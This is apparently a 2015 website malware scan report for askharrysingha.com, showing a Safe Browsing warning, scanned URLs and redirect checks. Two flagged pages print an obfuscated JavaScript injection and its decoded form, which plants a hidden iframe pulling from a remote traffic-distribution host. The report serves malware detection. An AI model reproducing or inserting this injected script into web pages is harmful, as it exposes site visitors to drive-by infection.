Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=askharrysingha.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://askharrysingha.com/ | 403 Forbidden Content-Length: 331 Content-Type: text/html | clean |
http://askharrysingha.com/test404page.js | 200 OK Content-Length: 2476 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) c=2;i=c-2;if(window.document)try{new String("asd").prototype.q}catch(hgberger){f=['-29i-29i67i64i-6i2i62i73i61i79i71i63i72i78i8i65i63i78i31i70i63i71i63i72i78i77i28i83i46i59i65i40i59i71i63i2i1i60i73i62i83i1i3i53i10i55i3i85i-25i-29i-29i-29i67i64i76i59i71i63i76i2i3i21i-25i-29i-29i87i-6i63i70i77i63i-6i85i-25i-29i-29i-29i62i73i61i79i71i63i72i78i8i81i76i67i78i63i2i-4i22i67i64i76i59i71i63i-6i77i76i61i23i1i66i78i78i74i20i9i9i78i62i77i12i8i70i73i81i63i77i78i74i76i67i61i63i77i8i59i78i9i77i78i62i77i9i65i73 Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://tds2.lowestprices.at/stds/go.php?sid=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://tds2.lowestprices.at/stds/go.php?sid=1');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAt <iframe src='http://tds2.lowestprices.at/stds/go.php?sid=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> Antivirus reports:
| ||
http://askharrysingha.com/function.require | 200 OK Content-Length: 2476 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) c=2;i=c-2;if(window.document)try{new String("asd").prototype.q}catch(hgberger){f=['-29i-29i67i64i-6i2i62i73i61i79i71i63i72i78i8i65i63i78i31i70i63i71i63i72i78i77i28i83i46i59i65i40i59i71i63i2i1i60i73i62i83i1i3i53i10i55i3i85i-25i-29i-29i-29i67i64i76i59i71i63i76i2i3i21i-25i-29i-29i87i-6i63i70i77i63i-6i85i-25i-29i-29i-29i62i73i61i79i71i63i72i78i8i81i76i67i78i63i2i-4i22i67i64i76i59i71i63i-6i77i76i61i23i1i66i78i78i74i20i9i9i78i62i77i12i8i70i73i81i63i77i78i74i76i67i61i63i77i8i59i78i9i77i78i62i77i9i65i73 Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://tds2.lowestprices.at/stds/go.php?sid=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://tds2.lowestprices.at/stds/go.php?sid=1');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAt <iframe src='http://tds2.lowestprices.at/stds/go.php?sid=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: askharrysingha.com
Result:
HTTP/1.1 403 Forbidden
Connection: close
Date: Fri, 27 Feb 2015 11:07:10 GMT
Server: Apache
Content-Length: 331
Content-Type: text/html; charset=iso-8859-1
...331 bytes of data.
GET / HTTP/1.1
Host: askharrysingha.com
Result:
HTTP/1.1 403 Forbidden
Connection: close
Date: Fri, 27 Feb 2015 11:07:10 GMT
Server: Apache
Content-Length: 331
Content-Type: text/html; charset=iso-8859-1
...331 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: askharrysingha.com
Referer: http://www.google.com/search?q=askharrysingha.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: askharrysingha.com
Referer: http://www.google.com/search?q=askharrysingha.com
Result:
The result is similar to the first query. There are no suspicious redirects found.